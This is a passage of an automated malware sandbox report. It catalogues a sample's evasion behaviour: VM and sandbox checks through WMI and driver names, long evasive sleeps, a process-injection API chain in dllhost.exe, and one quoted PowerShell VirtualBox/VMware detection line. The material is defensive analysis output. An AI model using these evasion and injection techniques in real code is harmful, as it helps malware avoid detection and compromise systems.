Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 38_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: VBoxMiniRdrDN
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6365 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3527 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 527
Source: C:\Windows\System32\cmd.exe Window / User API: threadDelayed 419 Jump to behavior
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 417 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6569
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3067
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3567
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2428
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 423
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 645
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 582
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 554
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 523
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 511
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 497
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 439
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 492
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 459
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 472
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 461
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 454
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 457
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 447
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 449
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 444
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 445
Found evasive API chain (may stop execution after accessing registry keys)
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\cmd.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Found evasive API chain checking for process token information
Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Windows\System32\cmd.exe API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\conhost.exe API coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exe API coverage: 9.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324 Thread sleep count: 6365 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152 Thread sleep count: 3527 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088 Thread sleep count: 6194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924 Thread sleep count: 527 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 936 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7480 Thread sleep time: -41900s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780 Thread sleep count: 3567 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780 Thread sleep count: 2428 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 1424 Thread sleep count: 423 > 30
Source: C:\Windows\System32\dllhost.exe TID: 1424 Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 3604 Thread sleep count: 645 > 30
Source: C:\Windows\System32\winlogon.exe TID: 3604 Thread sleep time: -64500s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5504 Thread sleep count: 582 > 30
Source: C:\Windows\System32\lsass.exe TID: 5504 Thread sleep time: -58200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6332 Thread sleep count: 554 > 30
Source: C:\Windows\System32\svchost.exe TID: 6332 Thread sleep time: -55400s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 7152 Thread sleep count: 276 > 30
Source: C:\Windows\System32\svchost.exe TID: 7024 Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260 Thread sleep count: 523 > 30
Source: C:\Windows\System32\svchost.exe TID: 6260 Thread sleep time: -52300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4328 Thread sleep count: 511 > 30
Source: C:\Windows\System32\svchost.exe TID: 4328 Thread sleep time: -51100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 368 Thread sleep count: 497 > 30
Source: C:\Windows\System32\svchost.exe TID: 368 Thread sleep time: -49700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5244 Thread sleep count: 439 > 30
Source: C:\Windows\System32\svchost.exe TID: 5244 Thread sleep time: -43900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2584 Thread sleep count: 492 > 30
Source: C:\Windows\System32\svchost.exe TID: 2584 Thread sleep time: -49200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4388 Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 4388 Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1032 Thread sleep count: 459 > 30
Source: C:\Windows\System32\svchost.exe TID: 1032 Thread sleep time: -45900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3916 Thread sleep count: 472 > 30
Source: C:\Windows\System32\svchost.exe TID: 3916 Thread sleep time: -47200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1396 Thread sleep count: 461 > 30
Source: C:\Windows\System32\svchost.exe TID: 1396 Thread sleep time: -46100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep count: 454 > 30
Source: C:\Windows\System32\svchost.exe TID: 768 Thread sleep time: -45400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5332 Thread sleep count: 457 > 30
Source: C:\Windows\System32\svchost.exe TID: 5332 Thread sleep time: -45700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6708 Thread sleep count: 447 > 30
Source: C:\Windows\System32\svchost.exe TID: 6708 Thread sleep time: -44700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4396 Thread sleep count: 449 > 30
Source: C:\Windows\System32\svchost.exe TID: 4396 Thread sleep time: -44900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5320 Thread sleep count: 444 > 30
Source: C:\Windows\System32\svchost.exe TID: 5320 Thread sleep time: -44400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3492 Thread sleep count: 445 > 30
Source: C:\Windows\System32\svchost.exe TID: 3492 Thread sleep time: -44500s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40D894 FindFirstFileExW, 17_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC40DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43D894 FindFirstFileExW, 17_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exe Code function: 17_2_00000253FC43DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 17_2_00000253FC43DA18
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36D894 FindFirstFileExW, 18_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exe Code function: 18_2_000002A5AF36DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_000002A5AF36DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 37_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exe Code function: 37_2_000001780DD2D894 FindFirstFileExW, 37_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EBD894 FindFirstFileExW, 38_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 38_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000020175EED894 FindFirstFileExW, 38_2_0000020175EED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165ED894 FindFirstFileExW, 39_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D0165EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661D894 FindFirstFileExW, 39_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_000002D01661DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 39_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000031.00000000.2819574872.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3415075913.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.49.dr Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FAC9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: qemuwmi2
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: System.evtx.49.dr Binary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.11.dr Binary or memory string: vmci.sys
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FD67000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: Amcache.hve.11.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.49.dr Binary or memory string: VMware
Source: Amcache.hve.11.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000008.00000002.2406288380.000001D49FE57000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: Microsoft-Windows-PowerShell%4Operational.evtx.49.dr Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
